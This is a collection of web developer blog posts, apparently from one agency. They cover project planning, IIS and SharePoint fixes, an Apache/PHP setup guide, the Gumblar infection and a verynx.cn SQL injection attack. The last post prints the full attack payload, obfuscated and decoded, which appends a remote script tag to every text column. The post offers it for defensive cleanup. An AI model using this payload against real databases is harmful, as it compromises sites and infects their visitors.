Devit!

Building on our experiences over the years we’ve developed a list of key tasks required to complete prior to developers writing a single line of code. We hope these tips will save you some time on your next project.

1. Review everything

When it comes to any project its important to review all the material that your sales team and project manager are handing you.  Make sure you take the time to sit in a quiet area and read through all of the material making notes as you go.

2. Ask Questions

Following up on the first task its very important to ask lots of questions.  Even if the answers to every question is a simple yes, never underestimate the importance of asking questions and clarifying your understanding of functionality.

3. Review proposed technology

Anytime someone makes a decision to use a specific technology to solve a problem its always useful to review the technology proposed and ensure there are no missed opportunities.  More often then not the person who is recommended the technology is doing so on tried and true past project successes.  This however does not mean that new cutting edge technology wouldn’t be a better fit.

4. Talk with your development team

Even if you deployed every piece of functionality on previous projects it’s important to talk through what your going to be doing at a high level with your development team.  It’s especially important to discuss functionality you’ve never deployed such as a twitter feed or other new technology solutions. Someone more often then not has a good idea to save you time, or recently solved a very time consuming problem with one of the technologies you’ll be deploying.

5. Plan your attack

Take the time to sit in a quiet area, think about how you’ll be developing this solution and then write it down!  We can’t stress this enough as to how important it is to document what will be done first, second and so on.  On top of that it’s important to have this information available to your project manager, after all he’s going to want reassurance you can hit and deliver on the clients time lines.  Try using a gantt chart to create your plan as this is a simple yet effective way to dip your toes into this process.

6. Review your plan

Remember that even if you’ve spent two hours or six hours planning out what you’ll be developing first and second and what you’ll be developing last it’s important to review this with the project manager.  They’ll be able to provide necessary feedback on concerns about client expectations and potentially bottlenecks you may not have considered.

7. Comp out functionality

At this point you should already have a design for your application however this design won’t illustrate every piece of functionality, and it’s not important to illustrate how a simple page will look before you get started.  Any functionality that isn’t 100% cut and dry should be laid out.  You can do this by hand, with many free layout tools or simply work with a designer to create rough composites that you can show to the client for sign-off.

8. Review everything with a team member

Take the time to review your plan and comps with another developer.  It’s always easier to have a mistake or suggestion pointed out to you know before your 50% down the project.  Have the other developer review your plan, your comps and talk him through everything so he understands what’s going to be developed without reading all of the information for the entire project.

9. Use pseudocode

Unless you’re the only developer in the world that doesn’t make mistakes or logic errors then this step is essentially for success.  Layout your functionality in pseudocode being as detailed as possible.  Overtime you’ll learn where details need to be very specific and where they can be a little less detailed.  This process will help you stop logic problems within your code every single time.

10. Start coding!

By putting some planning upfront you’ve just saved yourself lots pain and suffering moving forward.

Good luck – we hope this will save you some time and ensure things move smoothly for you on your next development project. Please share any tips you have for improving the development process in the comments.

When deploying a .NET web application with Crystal Reports you will need to install the appropriate crystal reports library on the server to use any reports you’ve built.

I recently ran into an issue where Crystal Reports Images (images in a report) would not show up on a new Windows 2003 Server.  After extensive web research with no solution in sight I decided to try to solve the problem on my own.

Note:  If you’re having problems with the images in the header bar (BusinessObjects toolbar) then please see this site below:
- http://www.gutgames.com/post/Crystal-Reports2c-issues2c-and-fixes.aspx
- or simply google “toolbar images for crystal reports not showing up”

To resolve my error I went into the Web Server(IIS) manager and performed the following steps:

1) Clicked on ‘My Website’ where I was using crystal reports
2) Clicked on ‘Handler Mappings’
3) On the right side under ‘Actions’ I selected ‘Add Managed Handler’
4) Request Path: CrystalImageHandler.aspx
5) Type: CrystalDecisions.Web.CrystalImageHandler, CrystalDecisions…….
6) Crystal Reports Image Handler
7) Press OK
Success!

I was able to track down this issue by looking at the URL for non-working images.  All pointed to the following:
http://www.MySite/CrystalImageHandler.aspx?*****useless info******

As you can see, the system is trying to access a handler to read out images specified in the report.

I hope this solution can save you hours of potentially wasted time and frustration.

One thing that can be frustrating for any developer is when you run into a problem and despite millions of search results when searching for a resolution nothing seems to solve the issue.  I thought I would share some simple solutions to two very frustrating WSS issues we’ve run into this past year.

The first issue is intermittent 403 Forbidden errors on a WSS (Windows Sharepoint Services) site.  We were seeing  anonymous users in our test environment who couldn’t use the website at all until an admin logged in.  After someone had logged in then anyone could use the website with or without a login.  What ended up being the problem was a permissions issue on the bin folder for the website.  To fix this problem please follow the simple steps below.

1. Ensure all sub folders that are virtual directories on the site are using the same application pool as the root site.  (This didn’t help me as everything was set properly, however I read countless posts of this causing problems for others)
2. Add read access on the bin folder for the account IUSR.  (You don’t need to add read access to the files, which is somewhat confusing but none the less that protects the files from being downloaded)
3. Success!

If you have any other problems please post your questions/solutions below.

Continuing on, I also ran into a strange DCOM error popping up in Eventlog on most of our servers with WSS sites running.  The error looks like this…

The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {61738644-F196-11D0-9953-00C04FD919C1} to the user <serverName>\networkservice SID (S-1-5-21-<serviceSID>). This security permission can be modified using the Component Services administrative tool.

Needless to say, getting this error several hundred times a day in Eventlog is not ideal.  The resolution is rather simple but not overly easy to explain.  Please carefully follow the steps below.

1. Copy the GUID (In my case it was {61738644-F196-11D0-9953-00C04FD919C1})
2. Open the registry editor by running regedit
3. Click on ‘My Computer’ at the top then select Edit -> Find and Paste the Guid (remove the {})
4. You should see an application name in the right pane when the Guid is found – in my case this was “IIS WAMREG admin service”
5. Close the registry editor and open Component Services from Control Panel -> Administrative Tools
6. Expand Component Services, My Computer, DCOM Config and find the application name discovered above in step #4.
7. Right click on the the application name and select “Properties” then select the Security tab
8. The first block should be set to Customize – select edit on the right side.
9. Now add the service account (in my case this was network service) and add the appropriate access which in my case was “Local Activiation” (which you can see in the error above)
10. Success!

Please share this information as both of these errors can be both frustrating and a waste of time.

Good luck and happy coding!

First Grab the latest copies of the following:

Apache (MSI with OpenSSL): http://httpd.apache.org/download.cgi
PHP Windows Binary (Zip Package): http://www.php.net/downloads.php
MySql Community Engine (MSI): http://dev.mysql.com/downloads/mysql/5.1.html#win32
MySql Tools (MSI): http://dev.mysql.com/downloads/gui-tools/5.0.html

Once you’ve downloaded the latest files follow these steps below:

1. Install Apache
   1. Network Domain: it doesn’t matter
   2. Server Name: it doesn’t matter
2. Unzip PHP into c:\php
3. Install MySql
4. Install MySql Tools
5. Create a folder c:\websites (or call it what you want)
6. Go to My Computer -> Right Click Properties -> Advanced -> Environment Variables
   1. Select Path -> Click Edit
   2. Add a ;c:\php on the end
7. Restart your computer!
8. Browse to the Apache Folder (Should be in Program Files\Apache Software Foundation\Apache
   1. Go into conf and open httpd.conf
   2. Change the following and Save
      1. ServerRoot (Should be set to your Apache folder – nothing should be changed here)
      2. Listen (In the event you want your Apache WebServer to not run at localhost:80 – you can specify a specific ip/port here
      3. In the LoadModule section you might want to enable rewriter_module (not necessary!)
      4. DocumentRoot "C:\websites"
      5. <Directory "C:\websites"> <– This is about ~15lines below the document root (REQUIRED CHANGE)
      6. Under the DirectoryIndex save yourself some time and add index.php after index.html with a space separating them
9. All Done making configuration changes to Apache
10. Copy the index.html file in htdocs to c:\websites
11. Click on the Apache Server Monitor in your TaskBar and restart Apache (if you have any problems check the logs folder in the Apache directory)
12. Open your Web Browser and Browse to http://localhost – You should see ‘It Works’
    1. If this failed to work – check the settings you’ve changed (typo’s will break things) also check the error logs in the apache\logs folder (Post any problems you can’t resolve in the comments)
13. Now that you have Apache working – lets get PHP working so you can start coding with php/mysql
14. Rename php.ini-distribution to php.ini
15. Open php.ini
16. Change the following and Save
    1. max_execution_time (Suggested for development to increase to 60)
    2. max_input_time (Suggested for development to increase to 120)
    3. memory_limit (Suggested for development to increase to 256M – great for any type of video conversion)
    4. error_reporting = E_ALL & ~E_NOTICE (Un-comment this and ensure other error_reporting lines are commented
    5. display_errors = On
    6. log_errors = On
    7. session.save_path = "c:\tmp"
    8. post_max_size = 16M (Suggested for development)
    9. doc_root = (You can leave this blank)
    10. extension_dir = "c:\php\ext" (Required)
    11. upload_max_filesize = 16M (Suggested for development)
    12. Un-comment the following extensions:
        1. extension=php_curl.dll
        2. extension=php_gd2.dll
        3. extension=php_mbstring.dll
        4. extension=php_mcrypt.dll
        5. extension=php_mssql.dll
        6. extension=php_mysql.dll
        7. extension=php_openssl.dll
    13. If you have access to an SMTP server configure SMTP
17. Re-open the httpd.conf for apache and add the following lines after the end of the LoadModule section
    1. LoadModule php5_module "C:/php/php5apache2_2.dll"
    2. AddType application/x-httpd-php .php
    3. PHPIniDir "C:/php"
18. Restart Apache
19. Create a file in c:\websites called test.php
20. Put <?php phpinfo(); ?> in the file and save
21. Access http://localhost/test.php
22. You should see a dump of all the information – All the extensions you’ve loaded above should have a section within the information displayed (If you can’t find mysql on the page for example then the .dll did not load properly – Verify your Environment Path variable (restart if you change it) and try again)
23. Don’t forget to look at your log files if you’re having problems – and if php says it can’t load a module that exists in a specific path then it’s likely an Environment Path issue.
24. Happy Coding!

We’ve been noticing a lot of traffic related to a new virus that has been attacking users/websites recently.

The virus works to exploit your system is several distinct ways.

1. An infected PC transmits FTP information to Gumblar.cn
2. Gumblar.cn connects to FTP’s submitted from infected pc’s and injects code into any php/html pages it finds
3. Any user visiting a site will have JavaScript run in their browser that does the following:
   1. Loads obfuscated JavaScript to connects to gumblar.cn if your running windows and not infected
   2. This in turn loads a nice piece of JavaScript that will load an SWF file
   3. This SWF file is the virus payload – it contains a byteArray that will inject a virus onto the computer (I believe it’s another SWF file being loaded as the byteArray)
4. If this computer is running windows and has flash it will become infected
5. See Step #1

The JavaScript code you’re looking for will look something like this:

One thing to note in the above code is the words gumblar in plain text.

When it comes to cleaning your webhost up you should take the following steps.

1. Take your website down (turn the web server off – stop infecting your users)
2. Remove the FTP information from your PC
3. Change the FTP username/password on your webhost
4. Look for new files created (image.php, etc…) that shouldn’t be there
5. Now that you’ve removed the backdoor & changed the password you need to perform cleanup
6. Find any PHP or HTML pages injected with the virus code and remove it

Once you’ve done this – everything should start getting back to normal.

There have been some useful scripts posted in the comments about this virus at blog.unmaskparasites.com.

If you’ve had any success or troubles with this virus please post your comments below.

If anyone knows of an easy way to convert a byteArray that’s being passed to an ActionScript Loader back into readable text please leave me a comment below.

Good Luck!

Have you ever thought about adding a Easter Egg to your website?

Using a Cheat Code such as the Konami Code you can now easily add one to your website using jQuery and the plugin that Trevor Morris developed.  Get the plugin here.

The code is simple and easy to follow.  Here’s a snippet to demonstrate how simple it is to perform a basic javascript action.

	$(document).ready(function() {
		$(document).cheatCode({
			code : '38,38,40,40,37,39,37,39,66,65',
			activated : function(){
				alert('Hidden');
			}
		});
	});

Don’t forget you’ll need to grab a copy of jQuery if you don’t already have it loaded up!

Please let us know if you like our Easter Egg.

UPDATE – The movie was fantastic and we all had a great time. We’ll be having another even later this summer so keep your eye on our blog or our Twitter feed for more info.

We’re considering 3 flicks for the next outing – District 9, Terminator Salvation and Transformers: Revenge of the Fallen – e-mail (contests@rtraction.com) or tweet (www.twitter.com/rtraction) your opinion.

CONTEST CLOSED – We’re all pretty pumped about this Friday’s launch of the new “Star Trek” movie, and we want to share the joy. We’ve got 25 free tickets* to give away. If you’re available to join us in London, Ontario on Friday May 8th for a 3:30pm showing of Star Trek, you can join us for at SilverCity Masonville. Just send an email to rtraction at contests@rtraction.com and tell us the middle name of Captain James Kirk. Easy, right? The first 25 people to submit correct answers will win.

Live long and prosper!

* And we mean FREE – no presentations, no sales pitches and definitely no spamming you later. No strings – we’re just looking for some good company for what promises to be a great flick.

· Sorry no rainchecks but keep your eye on our Twitter feed throughout the summer for more events.

This can be extremely useful in the event you have a toolbar, menu, or custom piece of code that is changing styles on the fly. We had a need to look up CSS Styles affecting an object on our page with JavaScript.  Unfortunately, it’s not as easy as document.getElementById(‘myobject’).style.background.  If you want to get the CSS styles that have been set by other JavaScript code, you’ll need to use this function to look up those styles.  Let’s say you want to put a div at the top of the page, but doing so would break the background styles on the body.  You can look up those styles, make an adjustment for the height of your div and then display it.

One thing to note is that IE and Firefox (as well as other W3C standards browsers) use a different function to accomplish this.  The W3C standard function is “getComputedStyle” whereas IE uses the proprietary “currentStyle”.

A working script for IE and Firefox is below:

getstylebanner = function(prop, element) {
    if (element.style[prop]) {
        return element.style[prop]; /* if its an inline style in IE */
    }
    else if (element.currentStyle) {
        return element.currentStyle[prop]; /* if its style set in IE */
    }
    else if (document.defaultView && document.defaultView.getComputedStyle) { /* Firefox */
        prop = prop.replace(/([A-Z])/g, "-$1");
        prop = prop.toLowerCase();
        return document.defaultView.getComputedStyle(element, "").getPropertyValue(prop);
    }
};

An example of looking up the top margin on the body of your page:

var marginTop = getstylebanner('marginTop', document.body);

With major concerns in the Information Technology industry around Digital Rights Management (DRM), the Canadian version of the Digital Millennium Copyright Act (DMCA) named “Bill C-61″ and other hot topic issues you need to know where your politician stands on these critical topics that could affect every man woman and child in Canada. Where does each party stand on open source software, DRM, Copyright Reform, Net Neutrality?

What are the current government’s views on these topics? Well, we can make assumptions based on the copyright bill “Bill C-61″ but unfortunately at this point we don’t have any promises or statements from the Conservative Party of Canada on any of these topics. We were shocked that most parties didn’t include any of these critical issues in their platforms. South of the border, in the current presidential election, each candidate has specifically noted their stance on many technology issues facing their IT industry.

After reviewing the New Democratic Party’s platform we found that none of these important topics are mentioned, however at the very least they’ve expressed their views on copyright reform in several news releases. Specifically we were able to find out that the Green Party of Canada and some NDP MP’s are in support of a copyright reform proposal by Michael Geist. Obviously these vital topics not registering on parties platform’s is far from ideal so we were again surprised to see that the Liberal Party of Canada had nothing on all of these topics along with the BLOC Québécois.

The only party that has addressed these issues in their official party platform is the Green Party of Canada. You can read more about their views here and here. We must applaud the Green Party for taking a stance on these important issues.  The Green Party has come out in support for open source software development, and open discussions on a variety of topics including internet privacy, copyright and DRM issues.  This is a step in the right direction but rather disappointing that no other parties are providing their views and stances on these important issues.

We need to demand more as professionals in the IT field and help our politicians make informed decisions on these critical issues by providing information, support and feedback.

Let’s work together and demand that all parties in Canada provide their stance on technology challenges moving forward within Canada and internationally.

Don’t forget to exercise your rights and Vote!

For more information on these topics we recommend Michael Giest’s blog. We would also recommend contacting your member of parliament and all political parties to bring these important issues to their attention. Click here to find your member of parliament.

Update

If the attack has changed to a different URL simply replace the URL in the solution script below. That is assuming the rest of the syntax has not changed.

Hope that helps

A new SQL injection hack seems to be out in the wild from verynx.cn. The SQL Injection hack uses a CHAR array to hide its payload which will insert some various html garbage along with a reference to a javascript file on the verynx.cn domain that will infect users when they visit your website. Luckily the domain with the offending javascript file now points to 127.0.0.1 which will help stop the spread of the virus. Unfortunately the botnet still seems to be spamming websites with the scripted attack leaving many entirely broken or loading extremely slow as each page might have hundreds of requests to the payload.

The attack below works like this:

You have a web page like www.mywebsite.com/showproducts.aspx?categoryId=12. An attacker visits your website with SQL code appended to the number 12 in the sample URL provided. A simple attack would look like www.mywebsite.com/showproducts.aspx?categoryId=12;SELECT * from tblProducts;. As you can see the attacker is guessing at the table name and hoping to get all of the information dumped back to them when you pass the categoryId to the database. Below you can see a much more complicated attack where they’ve used a CHAR array and then used the CAST command to have your SQL Server convert the array so it can be executed.

Sample of Attack:

;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Un-Obfuscated Attack:

;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Tips to prevent SQL Injection Hacks:

Do not trust user data. The easiest solution for resolving most issues with SQL Injections is to clean all incoming data. For any type of number or ID this is pretty easy as you can ensure any incoming number safely converts to a number (int for example) alternatively you can ensure other ID’s such as GUID’s convert safely to GUID’s before passing any information to your database.

Another simple fix – if you don’t need execute – ensure the user connecting to your database doesn’t have execute permissions.

Solution (Fixing your database after the attack):

Here we turn their code into the solution as we use the same process to loop through the entire database and remove what they’ve inserted into the database.

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

Additional Links:

All the details you need to understand SQL Injection: http://en.wikipedia.org

SQL Injection Cheat Sheet: http://ferruh.mavituna.com

SQL Injection Attack Detection Tools: http://52coding.com

Essential Security Considerations: http://nettuts.com

PHP+Mysql tips for preventing SQL injections: http://www.johnrockefeller.net

What to do if you’re still stuck:

Post your questions in the comments below and we will answer them as quickly as possible – also if anyone has any useful information we will update the article to share that information with others.